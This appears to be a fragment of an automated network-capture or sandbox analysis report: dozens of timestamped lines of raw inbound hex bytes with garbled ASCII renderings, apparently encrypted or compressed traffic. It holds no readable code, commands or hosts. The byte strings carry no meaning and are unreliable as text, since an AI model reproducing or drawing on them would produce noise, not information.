6b fe e7 e6 23 a7 fd 5b 05 50 aa bf de 61
                                                                            Data Ascii: JgML8_aK(7dDk0q1aYN!Yp$}`l[=Ex-g?@P%e4NDxt_J*tGz&nxJAf".MbmIbp(P;]5_Hx[^H%bu!p4xIEBk#[Pa
                                                                            2021-10-13 17:30:43 UTC50INData Raw: 1f cc 05 39 f9 ba a6 bb 29 42 a1 52 4c e4 ae b8 73 11 72 99 fb 80 fa bc ec ab bb 15 2d cd f3 dd b7 e2 ed 19 b7 4f 36 08 7a a1 8d 45 48 9f 27 01 5b 47 e9 45 f8 4d 96 0e a0 eb 04 f9 2c 91 e9 55 bc 15 94 a0 e0 3f 5a 4b c5 7f 9c a7 97 44 7e ed 99 33 54 6d 67 47 3e 75 80 dd 70 43 ad ce 2a 83 71 83 ae 5d c3 99 a6 a6 0e 57 b1 5a 11 d7 31 5e 91 5c 09 df e7 d5 a4 c6 85 f5 8d c6 97 c3 5c f0 48 63 f2 35 66 ed fd a2 f5 04 d4 ca 30 44 e1 0b 10 ed bf fa 84 ad 0d 55 d5 f4 aa 34 20 d3 c5 47 1b a6 f3 f9 7e 8d e1 0c 33 71 a9 bc 33 f6 59 dd 55 36 ba 5c 17 ff e4 d6 e2 ea a8 9f a7 6d 04 79 46 a5 14 19 64 d5 ba 6e 81 3e 61 2d ce 32 bb 06 40 a4 b2 ff 0f 63 27 d4 93 9b b7 b4 d9 b9 99 09 d3 75 18 b5 4e d7 b5 92 d6 d9 dd 7c ad 11 ad 74 47 15 72 26 12 2d e3 cc e4 d3 1c a2 b1 af 2d
                                                                            Data Ascii: 9)BRLsr-O6zEH'[GEM,U?ZKD~3TmgG>upC*q]WZ1^\\Hc5f0DU4 G~3q3YU6\myFdn>a-2@c'uN|tGr&--
                                                                            2021-10-13 17:30:43 UTC51INData Raw: 84 f1 79 08 c6 17 09 ac 6f eb 54 e9 58 3d 01 97 1f 48 c5 96 a2 cf 4a 2b 16 4e 23 e2 1c 60 40 3a a6 8c 6d ec 89 5d 77 32 17 5f c3 29 5a a3 60 a3 00 2c 50 c7 54 5f cb f7 fd 5e 85 b5 77 76 87 33 f4 aa 36 b8 2a b3 dc cb 1b 18 47 ba fd 7c 9a ff 1e 5a ca 19 db c6 05 0d 13 f6 94 8b 5c a4 6f 9d 24 49 70 9e 1b bd 4c 40 26 43 8d a3 71 2f a1 8c 36 5f 1f 78 8a 83 e7 4f b8 8b 55 19 c6 a3 00 11 31 9b d4 e4 a4 ed 63 60 09 87 ad 70 d0 67 89 13 7d 68 cd d3 28 66 ca 15 1a b6 53 cc d5 87 73 4e 97 51 ec 9a 4b fa 89 f4 58 3c db 49 1d ad 8a 41 f8 09 1b d2 ef 2c fb 28 ab 84 5c f8 ea 74 1b a2 b6 31 bf e2 85 30 c8 b7 38 30 5b ae 09 80 10 29 be 31 88 70 49 f3 b3 81 2c f4 69 75 e3 d6 07 cc 60 59 21 fa 80 52 11 39 38 ec 6d ba 07 d4 55 f4 88 dc 1c 8c ec 32 d4 d6 94 a8 bc fc 32 e7 aa
                                                                            Data Ascii: yoTX=HJ+N#`@:m]w2_)Z`,PT_^wv36*G|Z\o$IpL@&Cq/6_xOU1c`pg}h(fSsNQKX<IA,(\t1080[)1pI,iu`Y!R98mU22
                                                                            2021-10-13 17:30:43 UTC52INData Raw: aa bb 60 05 da e0 ae 0b ca bc 10 bd 37 22 11 78 ab a3 f2 8d 9f 21 1c ea 74 cc 6d c5 60 91 02 a6 1e 23 f8 2c 9b e9 41 9f 17 a2 bc e0 35 49 4f c5 74 a8 bd 97 4a 6e 30 90 33 54 6d 29 7b 22 39 8a fb b2 40 ad c9 26 dc 45 83 4a 55 cf 91 a5 17 0f 46 c8 ed 18 c4 35 42 fc c2 31 1d ed d9 da 44 8b e4 8a 4f 81 b8 0c cd 48 67 d0 0a bd ee fb a9 ed 29 3c ed 30 42 c3 87 7f d0 b5 d2 12 be 0b 77 d4 f1 bb 3a 19 e4 ed 9d 12 8b f2 90 c7 51 43 04 47 63 b8 b8 00 0c 4f dc 5f 2f a1 46 0e d1 0d 0e e1 ec 86 3a 14 6c 0e 5b f9 b6 14 13 10 0a bc 7f 8d 05 bb 27 e6 a8 d4 b4 4b 8c ae 89 1d 65 34 c8 91 94 88 bb ce ba ca d7 c6 af 30 a5 5f d1 89 59 c2 da c6 5f 75 28 af 72 54 0d 09 2c d2 2e e5 d9 c6 03 15 b3 b2 96 f8 75 33 8d 17 7a ec 4a 47 1d 9d 87 c7 d4 a5 ad 25 28 90 11 4f e8 1c f5 f4 d5
                                                                            Data Ascii: `7"x!tm`#,A5IOtJn03Tm){"9@&EJUF5B1DOHg)<0Bw:QCGcO_/F:l['Ke40_Y_u(rT,.u3zJG%(O
                                                                            2021-10-13 17:30:43 UTC54INData Raw: 4e 1a a8 68 5b 4a 2c 3d 88 62 fc 87 2e 64 ae 17 5e a6 11 7c a1 6a 79 f5 0a 64 ea 4b b3 c8 fd e8 3c 6b 0f 77 7c a1 1d cd 94 27 bd 08 81 dd cd 37 0a 7b 92 b9 7d db c1 09 c0 e0 f2 d8 c6 5a 18 05 de b3 8b 5c ae c5 06 4b 6f 64 9e 1d ac 4a 68 cb 40 8d a5 1e 05 a5 8c 30 59 c0 7f e5 94 32 4e b2 9a 4a 76 01 a3 1a 1b 0b 51 39 2b 5e 33 74 70 03 f2 f8 70 d0 77 b3 0c 69 5a 4a e8 28 66 cb 6b 48 ab ad c7 25 93 6d 53 5f 51 e1 8b 52 ee 9f 70 11 02 8d bf eb 48 82 59 c2 2a 3f d7 ef 37 ed 35 26 3f 70 f7 f6 7d 5c 53 b6 31 bf 2b 5d 25 e6 bd 09 23 5e ef 2c 85 07 d5 bf 1d 8b 3e 5a f6 b3 da 28 ef 97 d4 ce d3 2c c7 7c 4a 24 fa 91 57 09 c7 39 c0 64 94 29 d6 55 31 85 c5 0f 40 ed 23 d1 dc 9f 56 bd ca 3b ee ba f1 3d 11 76 4b f3 e8 29 a2 f1 da 76 83 bd 08 a2 82 21 4a 26 9e dc 41 e0 d7
                                                                            Data Ascii: Nh[J,=b.d^|jydK<kw|'7{}Z\KodJh@0Y2NJvQ9+^3tppwiZJ(fkH%mS_QRpHY*?75&?p}\S1+]%#^,>Z(,|J$W9d)U1@#V;=vK)v!J&A
                                                                            2021-10-13 17:30:43 UTC55INData Raw: cc 6c dc 42 87 0b bb dc 01 64 3d 94 58 1c bb 3f 9f af ea 20 48 58 d1 7f 91 97 88 41 9a ec b5 39 45 63 46 4a b8 2a 87 cc 66 50 bf cf 20 a1 63 7d 4b 73 c9 e7 59 a6 0e 4c d1 e6 0d c4 29 54 fe dd 16 c8 13 d8 f6 44 94 f9 e8 1c 92 bd 78 e9 76 2d 25 dd 9b f2 e3 bc ee 2c 05 db 2f 48 37 91 3c e4 8d 3a 19 ad 0d 40 cd e3 a9 30 19 f0 da 55 ef 8a d8 e6 64 5a 55 94 1b 71 bc b8 1d 75 71 f3 5f 25 b8 5b 5f ec da 2a 1d f3 93 46 b4 6d 1f 43 92 81 ea 12 27 15 bd 7f 83 42 70 25 e6 a4 a4 20 59 9e a4 ec 1d 79 ca d2 ae 96 e4 20 df b2 4e 73 d4 68 0b b1 5f c0 b0 51 3b ca e2 7e e6 92 af 74 4d 0e 60 1d c2 2e f2 d8 d3 33 e1 a3 9b b2 37 7d 3b e4 50 50 ee 4c 5e 2e 84 84 cc aa 93 b0 3c d0 80 37 57 d9 f5 d3 f6 d5 9a 66 5c b7 74 85 73 c1 58 d6 5e 9c 06 e1 45 70 10 15 80 03 c1 2e 28 30 4a
                                                                            Data Ascii: lBd=X? HXA9EcFJ*fP c}KsYL)TDxv-%,/H7<:@0UdZUquq_%[_*FmC'Bp% Yy Nsh_Q;~tM`.37};PPL^.<7Wf\tsX^Ep.(0J
                                                                            2021-10-13 17:30:43 UTC56INData Raw: bc ef 63 55 d3 27 81 bc f6 0f 7d 7a 9c 33 cd 82 ac 90 2a 69 de cb 5e e3 6d ba f7 6d d0 da 0e 4d 1e 83 f3 cd 58 0d 15 99 0b 8a 5c ae 8c b0 51 58 6d 8f 0b 27 5a 51 2d 52 9d 39 1e e6 a7 8c 3c 48 0b 16 65 83 33 44 ab 8e 51 12 d7 b3 0d c7 ab 8c d6 df b0 fd 75 b7 93 e8 0a 70 d0 7c 87 da 17 bf 3f d3 22 75 cc 77 3d a9 ad cb ea 93 74 41 e6 8b e9 9a 50 e5 a7 d0 b7 2c ff 2e 3c b5 5c 4a f6 13 19 d1 80 19 fc 32 53 94 61 e6 f9 19 52 69 b6 37 a4 e4 77 2f c8 ba 25 4c 74 ac 18 83 01 c6 ae 72 9c 69 5a fc a2 80 3e 39 84 64 de c3 3d c6 42 57 db 05 6e 46 00 d0 ef d3 6d 83 20 c7 46 cc 27 38 f0 76 32 36 f4 e1 a8 56 bd da 28 fc c8 50 0d 14 7c 2e da d0 29 d7 fb 04 65 f6 2d 01 88 88 6a 7e c8 9d dc 47 ec a9 4f cc b3 a0 21 a6 84 61 04 1a e0 ef 9e b4 09 a8 3f 89 d7 5d 8b 60 ad 89 3c
                                                                            Data Ascii: cU'}z3*i^mmMX\QXm'ZQ-R9<He3DQup|?"uw=tAP,.<\J2SaRi7w/%LtriZ>9d=BWnFm F'8v26V(P|.)e-j~GO!a?]`<
                                                                            2021-10-13 17:30:43 UTC57INData Raw: 85 9d 41 b9 30 99 32 54 7c 52 6f 7e 39 80 d5 67 4a 85 2c 32 b3 7e ab ae 5c c3 9f e2 fb 0e 46 c4 f3 15 de 13 b2 ec cf 0f f7 0a da da 53 ad a8 87 d5 94 ae 74 f8 60 8f d9 22 62 c5 12 ac fc 2a 3c 94 30 42 cf 83 18 e4 9d ce 1c ad 0b 77 db f4 bb 36 20 bf c5 47 17 98 f3 f6 5d 4e 47 0e 35 59 a7 bc 1b 65 71 80 5f 25 b4 41 0e df 0d fb e0 ec 86 43 8e 43 0e 51 87 b2 3a 40 78 3b b9 6e 8d 3e 6e 35 ef bf bf 2e af 8f a4 fb 1e 63 1c f4 82 9c 90 dc f7 b0 44 66 c0 7c 09 ab 30 f5 a0 48 c3 da c7 66 92 47 89 76 47 02 6b 07 f8 0e e7 ca ca 7d 35 a0 b7 b8 20 64 3a e4 6f 53 ee 40 9f 03 b2 be fb bb 81 a5 36 24 a9 23 5e e1 79 0d f6 0b 90 59 67 92 74 94 6b ca ad a4 c8 85 2e f6 4d 58 2e 3d a3 09 1f 26 06 e5 4e fe ae 18 92 48 21 04 dc de d9 3e c1 c5 dd 8e 59 d0 5d 9a 57 52 d4 b1 23 8e
                                                                            Data Ascii: A02T|Ro~9gJ,2~\FSt`"b*<0Bw6 G]NG5Yeq_%ACCQ:@x;n>n5.cDf|0HfGvGk}5 d:oS@6$#^yYgtk.MX.=&NH!>Y]WR#
                                                                            2021-10-13 17:30:43 UTC59INData Raw: be d5 e0 db cb 14 45 d8 31 32 c7 5c 07 02 f0 2d 9d 86 bb fc 8d 23 61 fa 9e 1b b7 53 50 0e aa 8c a3 7b f9 b8 b5 6b 85 c2 7c 82 92 36 66 52 8a 40 13 4a fc 1a 11 30 b2 f4 d5 a1 e7 6e 70 0f 90 15 63 d6 67 99 11 71 6e 01 2c d7 99 c2 2c 83 ab ad c7 f3 5c 77 6c be 42 e9 90 72 d1 94 fe a0 37 df 79 14 b7 56 92 e7 04 22 d7 ef 7c e2 32 55 85 70 f7 fc 76 74 6b b6 4b b4 f5 5f 59 cd ba 23 31 5e ae 18 9f 07 d7 be 06 bb 6f 5a f0 b2 90 29 91 97 74 de d1 26 d3 6a 25 c5 fb 91 5d 16 98 0a c8 66 85 46 de 54 f2 8e cf 09 a1 70 23 d1 c3 b7 30 bc d0 31 e3 c8 cc 0c 14 7c 30 f4 f9 2f c3 d9 f2 63 f0 01 1f 2f 8f 2b 62 c9 8e d4 56 e4 bf 10 a8 b3 a0 e0 06 95 69 f6 0c c8 26 8a b4 03 b9 23 9d ff 75 94 50 ac 9e 32 4c 5b 59 9c 00 0d 03 74 6b a3 f2 4c 46 50 d9 81 b2 1e c5 cc cf 77 98 11 7e
                                                                            Data Ascii: E12\-#aSP{k|6fR@J0npcgqn,,\wlBr7yV"|2UpvtkK_Y#1^oZ)t&j%]fFTp#01|0/c/+bVi&#uP2L[YtkLFPw~
                                                                            2021-10-13 17:30:43 UTC60INData Raw: eb 0e c9 a6 08 6e ec e2 11 d1 13 b1 ee cf 03 f7 71 d9 da 5f 96 f1 81 fd 62 be 72 f7 60 49 d8 22 62 c5 1e ae fc 26 3c 55 30 42 c3 83 17 eb 9d 45 1b ad 0b 77 e8 f2 bb 36 20 07 c4 47 1b a3 68 ff 75 5a 50 0b 22 77 90 96 19 63 5f cb 77 0b b2 4d 15 c1 db d4 f3 eb a8 7b a4 6d 08 47 a5 8a 14 13 01 0f 45 6f d4 01 60 30 ea 73 1c 06 4a 8c b5 fb 27 4b 36 d3 84 8a b2 9d df b2 4e 76 ff 35 6b 81 5d d1 a4 5b cd da c6 5f c2 2a af 72 28 2c 78 0e d6 3f eb db ca 7d 3b a0 b7 b8 37 7d 22 8f 50 50 ef 4a 47 63 b1 94 cc bd 90 a7 0d 6d 85 1b 58 8e 59 d1 f6 d3 82 6d 47 ca 63 95 61 d3 78 82 01 a7 2c fc 40 63 1f 2c aa 2b 96 26 00 c9 26 fc ac 18 94 18 1c 15 db b1 fd 3c c1 78 cc 87 48 91 75 98 56 ad d2 de 05 83 0f 72 f8 16 0f 93 9a 66 90 6a 18 65 9c 83 8f b4 e9 39 d6 8c 99 0b 79 92 2d
                                                                            Data Ascii: nq_br`I"b&<U0BEw6 GhuZP"wc_wM{mGEo`0sJ'K6Nv5k][_*r(,x?};7}"PPJGcmXYmGcax,@c,+&&<xHuVrfje9y-
                                                                            2021-10-13 17:30:43 UTC61INData Raw: 1f d2 68 42 26 45 9c ae 76 40 81 8e 36 59 c0 74 a2 ca 37 4e be e4 6a 1b c6 a5 1c 00 3c f5 d0 d5 a1 e7 bc 74 2c af f4 70 d0 7c 8c 0e 0b ea 3f d3 22 6b e2 3c 1f ab a7 13 c0 93 74 53 5f 51 f8 8b 4b ee 84 70 11 02 2f bf eb 48 4d 4a f0 d4 1b d1 fe 3b ef 22 6b 0e 8e 08 03 a8 61 4e 9e 06 b5 f5 55 30 c3 c9 99 23 5e a4 15 ad 3f d7 bf 17 55 6a 5c dc ba ba 29 ef d6 40 cf d3 2c d1 7c 4a e1 fa 91 57 d4 c7 39 c0 c6 93 29 d6 40 f2 84 c5 15 89 ec 22 d1 c9 9f 56 ef d0 3b ee 3c eb 0d 14 af 22 f2 e8 3c d7 f1 da 7d f0 07 09 b1 b8 28 62 35 9d dc 47 68 a9 6e dd a5 b3 e2 9c 54 61 e2 18 e0 fe 8d ad f7 a9 09 8f d5 4f 94 4a b9 8f bf 5a 5d 46 97 ed 04 3e 70 74 a5 7b f8 c9 50 d8 23 bc 1d c2 de e7 af 9f 0e 7d 98 1c dd 54 5e eb 74 58 7b 40 40 b2 16 83 7c 31 3e fc 07 fc 90 fc a2 f9 3c
                                                                            Data Ascii: hB&Ev@6Yt7Nj<t,p|?"k<tS_QKp/HMJ;"kaNU0#^?Uj\)@,|JW9)@"V;<"<}(b5GhnTaOJZ]F>pt{P#}T^tX{@@|1><
                                                                            2021-10-13 17:30:43 UTC63INData Raw: 9d a9 f1 48 67 46 33 63 f0 db 3d fc 2c 14 55 21 45 d7 8f 61 71 a4 d5 07 a4 2d fc c6 f0 bb ac 19 e5 da 4d 31 32 f4 ff 75 cc 52 09 2c 7a 98 5e 1b 63 59 41 4e 22 ad 41 00 84 b9 c4 e5 f3 8d 4a dc f1 1f 56 92 aa 34 86 0b 19 bb f2 9a 2a 78 2b f9 d2 27 17 4d 93 b4 eb 93 74 33 cc 93 8a 06 a2 d8 ad 56 76 4d 64 1f bc 4c c7 3e 59 c2 d4 da 61 09 39 a8 6b 52 12 e6 1f d7 31 f5 ea 33 12 1f a2 2b af 21 6a 24 9d e4 43 e9 55 59 1a 0b 87 cb a4 98 8f a5 2e 81 1b c2 f0 74 cc ec c3 19 6d 48 ba 6f 82 fd c8 a1 c8 6e 93 b2 ed 41 6f 0b 1d 23 03 c1 24 9c de 4e cb b0 38 12 09 15 04 40 cf de 21 de 68 41 9f 5e 8b 7d ba a8 ad d4 b1 bf 90 08 6b c8 09 bb c1 99 79 b4 13 ae 76 9b 9a ab b3 7c 47 c6 92 bd 21 27 87 08 00 ed 45 43 cc aa 88 93 d5 af 8d 3e f3 66 e6 29 aa 68 5d 6d 65 8c a9 48 79
                                                                            Data Ascii: HgF3c=,U!Eaq-M12uR,z^cYAN"AJV4*x+'Mt3VvMdL>Ya9kR13+!j$CUY.tmHonAo#$N8@!hA^}kyv|G!'EC>f)h]meHy
                                                                            2021-10-13 17:30:43 UTC64INData Raw: a3 10 39 69 9e c7 d2 ce 5d 63 61 03 25 d2 69 c9 08 a3 00 78 5a 17 8a 2c 66 cc 6b af aa ad c7 5b 93 7c 48 81 51 f8 8c 49 ef ae 20 a4 3d f7 50 05 a6 4c d6 ea 0b 31 1b ed 3d fe 3b 3a 34 71 f7 f6 65 67 7d a5 23 8d 44 5d 23 cc ab 30 32 4c 34 0b 81 0e c6 bb 72 3b 69 5a fc a0 95 5a 8e 96 74 c5 c0 2a c0 79 62 7e fe 91 51 66 75 38 c0 6e 86 d7 d7 43 0c 85 d4 0a a1 b7 27 d1 cf f0 e4 bc d0 31 fa 45 eb 1b ea 77 32 f7 c0 75 d3 f1 dc 08 42 06 08 a8 9c d5 63 de 63 dd 27 fd ac 46 91 b7 a0 e2 cb 36 60 e2 12 f4 11 8a a2 f7 a9 45 98 d2 74 ce 54 aa 8f d0 f9 5a 59 97 07 fb 13 6a 83 b5 1e 98 7f 46 da 23 a3 65 f3 da e7 b8 8a 1b 6e eb 08 f1 5c 56 ef b8 44 7e 5c 7b ef 12 92 7c 89 d1 e7 3c d1 da f5 b9 ec 98 4e 8c 47 35 28 6c 80 58 6f 5f 3e b4 6e 23 df 40 82 fa ea 88 fb a6 ef 79 da
                                                                            Data Ascii: 9i]ca%ixZ,fk[|HQI =PL1=;:4qeg}#D]#02L4r;iZZt*yb~Qfu8nC'1Ew2uBcc'F6`EtTZYjF#en\VD~\{|<NG5(lXo_>n#@y
                                                                            2021-10-13 17:30:43 UTC65INData Raw: 26 49 cf 7e 0c 27 d2 f1 db 54 1b a0 ed ee 71 41 49 07 22 7b 22 90 72 67 59 db 77 01 b2 4d 15 75 34 df f5 3a 93 5f b7 67 1f 4f bc 45 1c 9d bc 0f 8a 59 9d 3e 6c 2d 68 19 aa 02 c4 3b b3 27 1c 7a 27 df a9 83 8b b7 ce be 4c 71 da ef 30 c9 5b d1 a4 60 e1 cb ce 7d 37 39 a4 63 91 17 71 1f dc 39 35 d9 c0 03 13 b3 a8 8f fd 06 dc 8a 78 58 fd 43 50 08 84 b7 da a8 a1 97 97 2b 81 1b 4f c0 62 f3 6c c6 90 6d 5a bc 63 8d 12 29 a7 d7 78 96 3f ed 57 64 3e bc a1 03 c7 32 8d c8 49 d4 af 0c 86 1d 3d a7 dc de d3 16 9b 7e dd 84 d5 ab 5d 9a 56 be c6 a0 31 96 83 4b e9 1f 26 f8 26 66 96 0f 1a 3d 9c 85 82 b2 36 db ea 8d 99 00 b4 89 1e 13 7c 42 57 c0 a7 b0 0d c4 ae 81 17 c5 f5 f2 5a 88 f6 4c 6c 69 bb ae c5 7c 4a 71 5b 46 4a 68 4f 61 0d db 7a 51 9b 37 7a 45 f8 3a 26 13 8c ea 34 9a ef
                                                                            Data Ascii: &I~'TqAI"{"rgYwMu4:_gOEY>l-h;'z'Lq0[`}79cq95xXCP+OblmZc)x?Wd>2I=~]V1K&&f=6|BWZLli|Jq[FJhOazQ7zE:&4
                                                                            2021-10-13 17:30:43 UTC66INData Raw: 38 b1 87 5a 05 64 a0 74 91 ea da 11 b9 ac 3a 4c cb e1 ce 96 db 9b 0b 90 26 39 13 78 a7 9a 24 99 12 20 0b 85 48 df 4f de 6f 80 15 ba 4f 03 f9 2c 9a 95 44 98 2b bd 17 e0 3f 50 63 99 7f 80 8f bf a0 65 ed 93 1a 80 6c 57 4d 0a 1d 80 d3 60 2c 85 cd 31 b5 69 94 5d 89 d0 8e db a8 19 cb c5 e0 11 d6 28 72 fe e9 1f ce fa 55 e5 55 85 f4 25 c4 b4 a9 5a 5a 48 67 d0 3d 44 61 c4 af fc 2d 02 e1 83 42 c9 9a 3c c2 a4 dc 0f 20 0a 5f c6 f1 a8 13 19 c1 d3 56 06 07 cb ff 75 51 e1 1f 10 65 90 13 1b 63 53 c2 20 a9 8d 4d 1f d6 33 fd 10 ed 80 5f 9c 31 f1 ae 72 b3 07 00 1a 0e a8 78 b3 a8 65 24 e6 bf b4 2e 04 88 a4 fb 60 7c 35 d3 88 b1 8b a2 d0 9a 14 64 d1 73 77 ba 5e d1 a8 71 01 cb ce 77 84 3e b0 7d 91 17 62 1f c4 38 d0 9b dd 04 07 74 a4 a6 0d 3c 22 9b 6b 75 ff 6d 50 2b f8 b5 ce bb
                                                                            Data Ascii: 8Zdt:L&9x$ HOoO,D+?PcelWM`,1i](rUU%ZZHg=Da-B< _VuQecS M3_1rxe$.`|5dsw^qw>}b8t<"kumP+
                                                                            2021-10-13 17:30:43 UTC67INData Raw: 33 64 44 13 59 c3 a0 1b 22 b9 dd 46 ef 3a 62 de 6b 84 33 29 17 76 27 90 fe c1 0d 17 5e ad 6d 5f b4 63 f1 69 2e af fc 72 4c c6 d6 f6 42 f3 1e 7a 61 57 31 cd 9f a2 b0 31 60 c9 17 a5 7e f3 ab f0 6b 0d d8 13 4b c5 08 ca f7 be 1c 16 78 40 9d 86 b3 05 11 1b 49 66 9f 08 bb 5a 51 23 cd 3a bb ab 3c b5 9f 38 74 83 68 8f 92 3d da a9 8f 51 17 52 79 0c 3e 29 8b c1 c5 af fc 67 70 07 13 e3 8f d0 76 9f d6 69 54 2e dd bc bc 54 2f 0f ba ab dc f7 93 60 55 87 d6 f8 9e 4b f1 02 24 38 3b e6 47 05 b9 c8 64 0d 03 08 dd c7 e9 ff 32 5f ad 54 f7 fc 7c 7e 7a b8 26 63 e6 51 32 c2 ab 31 12 f6 70 17 a0 2f e0 bf 1d 81 7b 55 de 8b 90 29 e5 49 74 c9 f9 2c 90 60 4a 24 fa 91 57 09 c1 39 c0 64 82 2b d6 55 e4 86 c5 0f 86 ec 23 d1 d3 9f 56 bc cb 0b ed bb c6 0d 14 76 39 f2 e8 38 d5 f2 f2 13 f0
                                                                            Data Ascii: 3dDY"F:bk3)v'^m_ci.rLBzaW11`~kKx@IfZQ#:<8th=QRy>)gpviT.T/`UK$8;Gd2_T|~z&cQ21p/{U)It,`J$W9d+U#Vv98
                                                                            2021-10-13 17:30:43 UTC68INData Raw: 1e 1b 6b a5 f8 0c 8f 9f 2d 18 8c 58 c5 7a a0 64 97 04 a7 d2 35 ee 43 b1 36 55 b0 20 8d 31 cb 3f 5a 4a d0 75 9e 08 bc 4a 64 ec 8a 37 5d 7c 5d 4e ac 8e a8 f3 6b 43 a7 de 35 a5 69 89 43 d1 74 87 e2 be 0f 46 c8 f1 15 c9 2a 51 f9 d1 21 c7 ec d9 d0 44 8c e4 8d ba b5 bc 72 fb 59 6e cb 27 0b c5 fa af f6 3d 1d a6 1b 43 c9 9a 1b ea b6 c4 1b 23 ba 30 ea f1 bb 3a 1b e5 ed 55 10 8b fe ee 72 3f 55 0f 33 7b b4 b0 11 bd 4c f8 77 12 b2 4d 15 c4 2e fd cc ee 80 53 ac 45 36 51 8d ae ca 13 0d 33 bb 6e ca 31 67 24 e6 ae bb 06 4a 8c a4 fd 38 64 34 d3 b5 9d 9a b3 ca b2 44 60 cb 75 18 a2 44 e1 a4 48 a4 cb ce 77 05 28 af 65 34 65 7b 0e da 23 ea a5 39 13 1f a8 a4 b8 24 5d 55 8a 78 58 fd 4f 50 0a 86 93 da aa 84 21 92 41 77 1a 5e eb 78 d4 e1 0f 92 aa c2 fa 74 94 60 d5 b7 d1 63 80 38
                                                                            Data Ascii: k-Xzd5C6U 1?ZJuJd7]|]NkC5iCtF*Q!DrYn'=C#0:Ur?U3{LwM.SE6Q3n1g$J8d4D`uDHw(e4e{#9$]UxXOP!Aw^xt`c8
                                                                            2021-10-13 17:30:43 UTC70INData Raw: 46 3e 1f 76 d1 7a 5a a5 42 01 da 39 73 c7 f4 5c cb fb 9d af f7 0f 7d 19 70 39 dc 98 3e 90 5f 69 de cb 19 9f 69 ba fb 54 4c c8 1e 5c bb e5 da c6 56 62 ee f7 f7 80 54 8c ae 98 24 4f 4e 1f 1f bd 4a 68 b1 40 8d a5 02 d3 a6 8c 3c 30 2c 78 8a 89 3b 66 c7 8f 40 1f ee 21 1e 11 37 b2 50 d7 a1 eb 11 9d 08 87 c9 1f 2d 77 9f 0a 70 78 bc d7 28 60 e2 80 1b ab ab e5 6e 81 65 42 fa be e8 9a 50 90 6b ff a6 37 ff 69 97 b3 5c 4a cf 86 0c d7 e9 15 7b 36 55 83 03 0b fd 76 7e 04 4b 30 b5 ff 57 0b 4a be 23 25 76 2a 1c 85 01 ff 38 19 8b 6e 29 0a b2 90 23 80 6a 75 cf d9 24 f9 f4 4e 24 fc b9 de 0d c7 3f e8 f3 91 29 d0 26 0e 85 c5 05 e6 11 22 d1 c3 89 5e d2 2e 3a ee b1 fd d7 07 64 30 f6 d0 0e d6 f1 da 19 0f 06 08 a8 80 3a 66 a7 9d de 47 e6 d2 6f ce b3 aa 8b 14 85 61 e8 0b e7 fe 8c
                                                                            Data Ascii: F>vzZB9s\}p9>_iiTL\VbT$ONJh@<0,x;f@!7P-wpx(`neBPk7i\J{6Uv~K0WJ#%v*8n)#ju$N$?)&"^.:d0:fGoa
                                                                            2021-10-13 17:30:43 UTC71INData Raw: 55 ba 3e 85 bc e0 3f 5a 7e c2 b1 83 87 9b 50 64 ed 98 21 64 6b 57 68 20 39 80 45 6a 43 bc d9 22 bb 40 96 48 5f c3 99 db ae 11 48 3c e1 3d d0 2d 47 e9 d0 06 cc e5 d9 cb 5d 9a e3 79 d4 be b0 7a f8 5c 08 de 20 64 e7 f1 b0 eb 3f 1c c9 21 4a de 6e 11 c1 b6 ca 0b a5 0d 4e ce ef ae ce 09 ce ce 4f 09 e4 dd fe 75 5a 5c 18 20 79 b8 a9 13 78 a7 dc 73 2c a3 4a 07 c8 4e 49 fe ff 88 55 b7 65 11 5b 73 a5 38 1a 1a 1e a6 73 17 32 6c 37 ee ae aa 0e 53 72 a5 d1 06 74 33 c5 9d 8b 06 a9 cc ba 44 71 d9 6a 15 5d 5e fd ae 56 48 e0 ce 77 94 3b ab 6b 49 17 72 0e c1 26 fc c1 32 13 33 a5 a6 b9 2b 6a 3f 98 70 52 ff 42 5e 00 69 97 e0 a9 83 21 92 39 5b 0c 88 6c 58 d3 f6 d4 96 79 50 a8 67 9c 61 c8 ae cb 8c 84 02 f4 57 77 0f 21 3f 1e d2 2c 00 de 41 c9 50 19 be 00 04 03 c6 c1 fa a2 df 6d
                                                                            Data Ascii: U>?Z~Pd!dkWh 9EjC"@H_H<=-G]yz\ d?!JnNOuZ\ yxs,JNIUe[s8s2l7Srt3Dqj]^VHw;kIr&23+j?pRB^i!9[lXyPgaWw!?,APm
                                                                            2021-10-13 17:30:43 UTC72INData Raw: e5 a1 93 36 b8 36 7c da a2 b9 1e 6d bc ea a6 c8 c4 0d 5f f0 55 da c6 5c 1c 17 e7 f2 9c 33 2d d2 9c 22 5a 60 b6 5c bc 4c 4a 37 47 9c a6 66 40 2e 8d 36 59 be e1 8a 83 39 5d bf 83 68 07 c5 a3 1c 00 37 b2 e0 d4 a1 e7 4a 4e 09 87 c9 49 2c 76 9f 00 69 57 17 d4 28 66 e1 17 17 ba a5 f4 15 82 65 44 98 4a fd b2 c2 fb 96 f8 b0 b0 f0 41 14 b6 48 58 f3 2a ab d7 ef 37 ea 1a 8f 86 70 f1 ea fb 73 6b b6 30 a1 e1 4b 0b 6f ba 23 29 76 32 18 85 0d c6 bb 35 85 69 5a f0 a0 99 38 e7 83 5c 57 d7 2c d7 6a c7 23 fa 91 56 1d d3 2d e8 c7 92 29 dc 41 da 5e c6 0f 8f fa ae d6 c9 9f 57 a9 c4 2f c6 18 ea 0d 1e 5e bf f2 e8 23 c4 fa cb 6f e4 2f 90 a6 88 2d 74 45 9a dc 47 ed bd 7a d8 9b 03 e4 a4 8e 75 ca ce e3 ef 8d a2 84 af 25 89 d6 48 84 44 82 2a bf 4b 51 71 01 13 05 18 54 e4 b0 7e c1 6e
                                                                            Data Ascii: 66|m_U\3-"Z`\LJ7Gf@.6Y9]h7JNI,viW(feDJAHX*7psk0Ko#)v25iZ8\W,j#V-)A^W/^#o/-tEGzu%HD*KQqT~n
